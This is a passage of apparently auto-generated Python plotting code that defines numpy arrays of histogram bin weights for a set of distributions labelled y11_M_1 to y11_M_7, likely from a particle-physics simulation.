4.5290812126,5.21995663486,5.38883849363,5.20460414769,4.62119763556,4.82078446866,4.51372722543,4.98966482744,4.54443369976,4.39090582814,4.3294943795,4.92825337879,4.23737645653,3.96102568763,4.14526003356,4.36019935382,4.23737645653,4.16061252072,3.96102568763,4.09920107208,3.88426175182,4.02243713627,3.57720600859,3.83820429033,3.59255849575,3.91496822614,3.27015026537,3.43903062414,3.3776191755,3.62326497008,3.80749781601,3.70002890588,3.34691420117,3.50044207279,3.14732736807,3.34691420117,2.90168157349,2.96309302214,3.07056343227,2.96309302214,3.20873881672,3.11662089375,2.80956515053,2.90168157349,2.67138976607,2.82491763769,2.91703556065,2.56392085594,2.64068479175,2.73280121472,2.65603727891,2.87097659917,2.5025094073,2.90168157349,2.73280121472,2.36433402285,2.67138976607,2.53321438162,2.60997831743,2.64068479175,2.31827506136,2.1033357411,2.47180293298,2.5025094073,2.14939470259,2.21080465123,2.11868822827,2.37968651001,2.19545216407,2.0265718053,1.98051284381,2.07263076678,1.79627999788,1.8269849722,1.91910139517,1.88839642084,1.79627999788,1.94980786949,1.91910139517,1.79627999788,1.96516035665,1.75022103639,2.19545216407,1.76557352355,1.85768994652,1.53528171613,1.84233745936,1.68880958775,1.84233745936,1.50457524181,1.41245896884,1.5506342033,1.41245896884,1.3510476702,1.50457524181,1.41245896884,1.09004983846,1.50457524181,1.44316469317,1.50457524181,1.24357801007,1.53528171613,1.18216671142,1.18216671142,1.13610834994,1.19751964858,1.30498930871,1.28963652155,1.07469705129,1.16681392426,1.05934426413,0.997932965487,1.09004983846,1.01328575265,0.982580178326,1.02863868981,0.875110518196,1.13610834994,0.997932965487,1.02863868981,0.844404793874,0.967227391164,0.936521666842,0.875110518196,0.967227391164,1.05934426413,0.905816092519,0.79834643239,0.967227391164,1.02863868981,0.936521666842,0.767640708067,0.813699219551,0.79834643239,0.859757581035,0.92116887968,0.859757581035,0.675523835099,0.997932965487,0.79834643239,0.629465473615,0.905816092519,0.583406962131,0.69087662226,0.69087662226,0.736935133744,0.675523835099,0.706229559422,0.552701387808,0.445231577679,0.537348600647,0.813699219551,0.767640708067,0.736935133744,0.583406962131,0.552701387808,0.844404793874,0.445231577679,0.614112536454,0.583406962131,0.706229559422,0.675523835099,0.629465473615,0.521995663486,0.644818260776,0.46058451484,0.614112536454,0.537348600647,0.506642876324,0.475937302002,0.475937302002,0.506642876324,0.322409130388,0.506642876324,0.399173216195,0.56805417497,0.521995663486,0.552701387808,0.506642876324,0.399173216195,0.475937302002,0.368467491872])
# Creating weights for histo: y11_M_1
y11_M_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0456393516902,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0454653083971,0.0,0.0,0.0,0.0456575075017,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0454926924109,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_2
y11_M_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.150581618448,0.0375576091651,0.0751699471544,0.0376123379893,0.0752395977957,0.113054984062,0.112880276391,0.0376386487322,0.112913900838,0.0752883609922,0.15055592751,0.075489952726,0.112939870688,0.0376527338118,0.112912025927,0.112999914344,0.0,0.11300394308,0.0376278486216,0.0753477383576,0.0376714984228,0.037570144731,0.0,0.150605759871,0.0753774115452,0.112882290759,0.150437467187,0.0376527338118,0.0753521389765,0.112917666157,0.0752611980169,0.113140827121,0.0377612617521,0.113039783332,0.0,0.0376376260531,0.0376527338118,0.0,0.0376123379893,0.0,0.037570144731,0.0753847097547,0.0,0.0376161497931,0.0,0.0,0.0376333648904,0.075310937407,0.112882166798,0.0,0.0376333648904,0.0,0.0753373101303,0.0375985628125,0.0375576091651,0.0376722886748,0.0,0.0375576091651,0.0,0.0376018477815,0.0,0.0,0.0,0.0375985628125,0.0,0.0376278486216,0.0,0.0,0.0,0.0,0.0375690600714,0.0,0.0,0.0,0.0,0.0,0.0752743998737,0.0376216660619,0.0377193009208,0.0,0.0,0.0377049524238,0.0,0.0753316389101,0.0377635860226,0.0754419023058,0.0377132113319,0.0376386487322,0.0,0.0,0.0,0.0377132113319,0.0376216660619,0.0377612617521,0.0,0.0,0.0,0.0,0.0,0.0,0.0375985628125,0.0,0.0,0.0,0.0,0.0376278486216,0.0,0.0,0.0,0.0,0.0,0.0377132113319,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_3
y11_M_3_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.639083964131,0.928246730447,0.763007447063,0.68070948531,0.701789842779,0.82473922127,0.474546237042,0.474398156104,0.474919791013,0.495310322879,0.495156605115,0.515701768825,0.597953417198,0.432896949787,0.288746402938,0.453649457279,0.350561663106,0.494891521955,0.494913155178,0.598298482347,0.20647860582,0.267936156068,0.288739699686,0.556943376461,0.309422737108,0.47445239151,0.309268409958,0.206364345837,0.412389415699,0.330031429368,0.206446917718,0.144384368478,0.226784889992,0.206406698204,0.185568114859,0.350722236469,0.288789059998,0.26816894174,0.24727155259,0.144233271077,0.18587219876,0.206343017307,0.164989891928,0.206124247527,0.144496328027,0.144468113428,0.123582668255,0.144397058953,0.123615788415,0.164996290487,0.144340660226,0.12363170864,0.185656018872,0.123824945123,0.0619013360217,0.288796372637,0.0825645531455,0.123696532137,0.0824036750895,0.123832760506,0.0825449156631,0.144281092688,0.0618964456945,0.0,0.0619324909104,0.103150088715,0.0412825279447,0.0618873658345,0.0412562176793,0.0825484653399,0.0206336771095,0.103119619387,0.0618538495728,0.0619529053607,0.0413161356144,0.061870226837,0.020686130059,0.0206582353885,0.0412554407114,0.103153668862,0.0412747125619,0.144340690695,0.0412292523233,0.0824829867523,0.0618313327388,0.0,0.0206341189148,0.0,0.0206582353885,0.04125141876,0.0206783146762,0.0619201051283,0.0412049530336,0.0825051379543,0.0,0.0206336771095,0.0206099262677,0.0413025462937,0.0205802339068,0.0618851415735,0.0,0.0413133781401,0.0,0.0412139110163,0.0412264491451,0.0,0.0413017236218,0.0,0.0206099262677,0.0,0.0,0.0,0.0,0.0,0.0206579154605,0.0206173150799,0.0206579154605,0.0206551427516,0.0206041066259,0.0206242316176,0.0206099262677,0.0206213217967,0.0,0.0,0.0,0.0205802339068,0.0,0.04129159257,0.0,0.0206099262677,0.0205963978857,0.0,0.0206141462697,0.020567787186,0.0,0.0,0.0,0.0,0.0206389025994,0.0,0.0206173150799,0.0206551427516,0.0,0.0,0.0,0.0,0.0205963978857,0.0,0.020686130059,0.0,0.0,0.0,0.0,0.0,0.0206022175275,0.0,0.0,0.0,0.0205802339068,0.0206551427516,0.0,0.0206434882334,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206389025994,0.0206099262677,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0205307974208,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.020661480372,0.0,0.0,0.0,0.0,0.0,0.0,0.0206141462697,0.0206141462697,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206022175275,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206783146762,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206099262677,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_4
y11_M_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.706920038114,0.684670875982,0.636500908617,0.743904773985,0.554988988799,0.540266492104,0.514292927763,0.49965941509,0.477395672806,0.433024962452,0.451498917309,0.458907588729,0.340428068477,0.381190867529,0.418196045676,0.370048624939,0.362659193307,0.325724360637,0.351577676299,0.277592121296,0.30340695738,0.247976374781,0.24423378496,0.199783560167,0.255310942953,0.188743679264,0.203465725027,0.188741725223,0.155442461051,0.185032053478,0.192375790612,0.122099245986,0.151718810397,0.148041169893,0.162834447967,0.173974135273,0.155428482142,0.103697650772,0.133222429161,0.118410587697,0.155435396441,0.118415788453,0.0962473131844,0.118425904373,0.107315212029,0.0851176516117,0.114684562132,0.10360826091,0.0851083022769,0.0924792306432,0.0813732730914,0.0925449465463,0.0665999713292,0.0629515963479,0.0703299801323,0.0407069886346,0.0925549271866,0.0776845997716,0.036997632542,0.0555055576505,0.0555117203953,0.0480980736857,0.0629194147952,0.0369826766126,0.0518260382614,0.0554705652849,0.0480886942888,0.048088904724,0.0370184956878,0.0370183604081,0.0444055824704,0.0333131078017,0.0480880479521,0.0481394993556,0.0517900688753,0.029603030217,0.0370032090745,0.0370205699775,0.0406853589035,0.033291553226,0.025915379011,0.011099558819,0.0444011332693,0.0148005756657,0.0333250424831,0.0295813553927,0.0185057906944,0.0111155834586,0.0184950434687,0.0259080438416,0.0148050263699,0.00741279444702,0.0111143178413,0.0184932247074,0.0111079596924,0.0296112221583,0.0259137556538,0.00740316553405,0.0074017390841,0.0,0.0148147319414,0.0,0.0222242556244,0.0148051391031,0.0222107426791,0.00739276402333,0.0185131408949,0.00739530577978,0.00740231176843,0.00740338047857,0.0147981511517,0.0111070548211,0.0073963023407,0.00740875860073,0.0111136504611,0.00370418840559,0.0185067376527,0.0147918140463,0.00740316553405,0.00740225915964,0.00740635663337,0.00738164703296,0.0111010348716,0.014797712244,0.0,0.0037047926552,0.00369276327798,0.0037047926552,0.00370835502231,0.0037071480262,0.00740516316523,0.00741115004634,0.0110984299846,0.00369801664214,0.0,0.0037071480262,0.00740210884879,0.00740371867798,0.0,0.0036982571395,0.00370400202014,0.00369858932648,0.0,0.00369887491709,0.01110931249,0.0,0.0,0.0,0.00368965785585,0.00370835502231,0.0,0.0,0.00369082276492,0.0,0.0,0.0,0.00369920860717,0.0,0.0,0.0,0.00369801664214,0.00370448301485,0.0,0.0,0.0,0.0,0.0,0.0,0.00370564792393,0.0036986825192,0.0,0.0,0.0,0.0,0.0036982571395,0.0,0.0036982571395,0.0,0.0,0.0,0.0,0.00369082276492,0.0,0.0,0.0,0.0,0.0,0.0037071480262,0.0,0.0,0.00739530577978,0.0,0.00369082276492,0.0,0.0,0.0,0.0,0.0,0.0,0.0037071480262,0.0,0.0,0.0,0.00741283803717,0.00370664448486,0.0,0.0,0.0,0.0,0.0,0.0,0.0036982571395,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370503615878,0.0,0.0,0.0,0.0,0.0,0.00370448301485,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00738812092121,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370400202014,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00740338047857,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369920860717,0.0,0.0,0.0,0.00370047873384,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369662927301,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_5
y11_M_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.234428163505,0.232542884632,0.234429663925,0.207967190479,0.225926178465,0.177708952216,0.185281426502,0.168241446322,0.172027458402,0.176770889064,0.134211570012,0.144621355241,0.123853084174,0.129495927145,0.126645922641,0.122896175735,0.13233445343,0.106801460728,0.11628664158,0.10399753415,0.110608718767,0.0954529821693,0.105861927163,0.0926448994254,0.0897881130187,0.0917062361047,0.074667141173,0.0879274560536,0.0680470290507,0.0907232053377,0.0841319313052,0.0586208447485,0.0661726432343,0.0519958712624,0.0586053003879,0.0708921271785,0.0567222571428,0.0415973992069,0.0557572464309,0.0415977743122,0.0416020355075,0.0548187181481,0.0406482329399,0.0368592200182,0.0387651746906,0.0396910694293,0.0415993497541,0.0463184585931,0.0349657938605,0.0264720761406,0.0311933155772,0.0330867267308,0.031200547606,0.0302403682495,0.0340351427874,0.0302612090959,0.0170193493925,0.0283549843478,0.0189121903861,0.0226800473729,0.0236269480044,0.0264623684173,0.0217419842206,0.0160778952889,0.0208011152811,0.0264682050546,0.012287530488,0.0179678554743,0.0170266114297,0.0207943033702,0.0226945414389,0.0113533459237,0.0198630221204,0.014177774253,0.0113517659805,0.0151232374813,0.0160725687947,0.0132332998021,0.0103933076067,0.0113504531122,0.00850323939096,0.0113445339517,0.0141818734029,0.0132300063782,0.0103986956182,0.00755748057978,0.00850647429844,0.00567068328159,0.00567507051232,0.00661908583441,0.00756755890702,0.0113422923229,0.0132329201956,0.00189050633868,0.00662716710143,0.00472418326247,0.00283596806652,0.00567575470426,0.012285690972,0.00756355278319,0.00472793581516,0.00756516423525,0.00473093965782,0.00662147150366,0.00189103448684,0.00756052943506,0.00472463789001,0.00661767994002,0.00850615620921,0.0047309666654,0.0047265029132,0.00756043340812,0.000945468929865,0.00283296872512,0.00189033379027,0.00378353038364,0.00377934570972,0.00850716149122,0.00283495528241,0.00283767854636,0.00283646920711,0.00283500929756,0.0066170542645,0.000946217339815,0.00283574750465,0.00472847446627,0.00188769605031,0.00188946354615,0.00379018324995,0.00189380726468,0.00472581572042,0.00378232854649,0.00378154982804,0.0,0.000944141057361,0.00189103598726,0.000945699694601,0.00189238636608,0.000943554992954,0.00189200976043,0.00567003509975,0.00283695984474,0.000943313725272,0.00188900441735,0.00283594105895,0.0,0.0,0.000945826780252,0.000946686221349,0.00189135407649,0.0,0.00283287569903,0.00283414055385,0.0,0.00189074790644,0.0,0.00189049133447,0.00378125574554,0.000945699694601,0.00189050633868,0.0,0.0,0.0,0.000944843104304,0.0,0.000945308834954,0.000946686221349,0.000943313725272,0.0,0.0,0.0,0.000946146219864,0.000946217339815,0.000946344125382,0.000945699694601,0.0,0.0,0.0,0.000945699694601,0.000946344125382,0.0,0.0,0.000945182499514,0.000945066967104,0.0,0.0,0.0,0.00189087544222,0.0,0.0,0.000945554153773,0.0,0.000945554153773,0.0,0.0,0.0,0.0,0.000945308834954,0.00189009372293,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000944843104304,0.0,0.000945323238995,0.0,0.0,0.0,0.000943313725272,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000943667674564,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000945323238995,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000944843104304,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_6
y11_M_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0794569059656,0.0826610287245,0.0719270975169,0.0612219204882,0.0783703579018,0.0600922973898,0.0762107953576,0.0601378467083,0.0633715109182,0.0515695512873,0.0590239690533,0.0654559077146,0.052608638086,0.0526060888237,0.0461327246506,0.0365679038641,0.044006827364,0.0654584569769,0.0386108264128,0.0429456219663,0.0439660016786,0.0247013166859,0.0332740883114,0.0300700180374,0.0408284596519,0.0236093476908,0.0300557534154,0.0418989623591,0.0311343350347,0.0289729617645,0.0343839771207,0.024697822697,0.0257659710855,0.0203976483745,0.0193503851919,0.0278882544179,0.0204008499479,0.0225694886156,0.0193338262339,0.0117965049594,0.0268579813187,0.0193561472745,0.0118157631363,0.0161048369212,0.0107543065612,0.0182354203516,0.0128805187566,0.0107341261512,0.0193544602627,0.0107319217891,0.0107283678176,0.0139634003815,0.0118177650569,0.0171824625671,0.0139549240845,0.00861776610463,0.00860400758621,0.00750732245592,0.0117995978143,0.0128784868446,0.00859474026808,0.0107478621761,0.0128910269657,0.00966803591705,0.0150368272425,0.0128866032458,0.00965413868876,0.00535905914185,0.00858865577887,0.00322295093522,0.00753151420507,0.00642868835185,0.00536710431366,0.00428542983944,0.00215147463475,0.00537555061938,0.00752314662657,0.0064202607907,0.00537099193862,0.00214157150061,0.00644828768,0.00322436277664,0.00857959839998,0.00537405855117,0.00321525328784,0.00537818235778,0.00644348157084,0.00322272562542,0.00107318917978,0.00107368216211,0.00537222158277,0.00214070887525,0.00429184048426,0.00107368216211,0.00428935495355,0.00429190046691,0.00321814557584,0.00106790583373,0.00213896450505,0.00429435975521,0.00430528409382,0.00643557885781,0.00215087930703,0.00107558661099,0.00322245795288,0.0,0.00107418864054,0.00535821188704,0.00323148496555,0.00215041481645,0.00213846552445,0.00322867177966,0.00214977525153,0.00214492940387,0.00214399779847,0.00107673265433,0.00320801638213,0.00107914770544,0.00323316672887,0.00107914770544,0.0,0.00106675866571,0.0,0.00214617441858,0.00107673265433,0.0,0.00107418864054,0.0,0.00214357154682,0.00107368216211,0.00107673265433,0.00106337751918,0.00215047554887,0.00215282986756,0.0,0.0,0.00107673265433,0.0,0.00107418864054,0.0,0.0,0.0,0.00107414777737,0.00106337751918,0.00107368216211,0.00107674427597,0.0,0.0,0.0,0.00107728636909,0.0,0.0,0.0,0.00107914770544,0.00106702671313,0.00107418864054,0.00215041481645,0.0,0.0,0.00214569718168,0.0,0.0,0.00107368216211,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00106841081259,0.0,0.00106484109563,0.0,0.0,0.0,0.00107418864054,0.00215047554887,0.0,0.00107414777737,0.0,0.0,0.00106675866571,0.0,0.00106337751918,0.0,0.0,0.0,0.00106675866571,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00107414777737,0.0,0.0,0.0,0.0,0.00106484109563,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_7
y11_M_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00664096320013,0.00728546549738,0.00688624248943,0.00671720033271,0.00469719056492,0.00486045234741,0.00623132043113,0.00542581946692,0.00510287759658,0.00404886926023,0.00493458195366,0.00518407472402,0.00534509067867,0.00421271253768,0.00429422241511,0.00380678190679,0.00388909330429,0.00356456410987,0.00380754570827,0.00363901432415,0.00388745568876,0.00186326701529,0.00226819181707,0.00266650172076,0.00267324077588,0.00299780140246,0.00145810820108,0.00267322977462,0.00315796711718,0.00210634133857,0.00299697002183,0.00194401937766,0.00259250884441,0.00234050621607,0.00129545793127,0.00153926760993,0.00170060087224,0.00259297404038,0.00105379051148,0.000971216183951,0.00162023826865,0.00153914156697,0.00129673706302,0.00129543907197,0.00161962848474,0.00105292235522,0.00121449324466,0.0020998081641,0.00129555835702,0.00129595251631,0.000890782229361,0.00153916734134,0.00121530105117,0.00128977688266,0.00145832979781,0.000891275242792,0.00129652536742,0.00121461394415,0.00129571646079,0.000728884602619,0.00097209392702,0.000891243339149,0.00137653844539,0.000642140956222,0.00105261039103,0.000972061080413,0.000728783705385,0.000486287262374,0.000560755707308,0.0010531745983,0.000972496258669,0.00056660083179,0.000566020594116,0.000648223550673,0.000405244309683,0.00064782624817,0.000405030099512,0.00072909504093,0.000485973097934,0.000648141041253,0.000810173040479,0.000810204472639,0.000405381982544,0.000405213977649,0.000486069437505,0.000405222935814,0.000324596930727,0.000324103131492,0.000404892583812,0.000243142059579,0.000486002958486,0.000404963306172,0.000161947918198,0.000648002896909,0.000324025494057,8.11512364819e-05,8.09765522524e-05,0.000567242676498,0.000323932140542,0.000404708548515,0.000486062836751,0.000648012955201,0.000405672101381,0.000324205600334,0.000242644017003,8.10351575148e-05,0.000405228279281,0.000161956404882,0.000242572980321,0.000243171291488,0.000243245628546,0.000243329080931,0.000162004181765,8.10674854915e-05,0.000404377882191,8.07223132259e-05,0.000567265779136,8.10351575148e-05,0.000243087996264,0.000243297963093,0.000567595659656,0.0,0.0,0.0,0.00016182454697,8.10323129044e-05,8.11512364819e-05,8.10674854915e-05,0.000161913028501,0.000242885730314,0.000161695989436,8.12819471194e-05,0.0,0.0001619438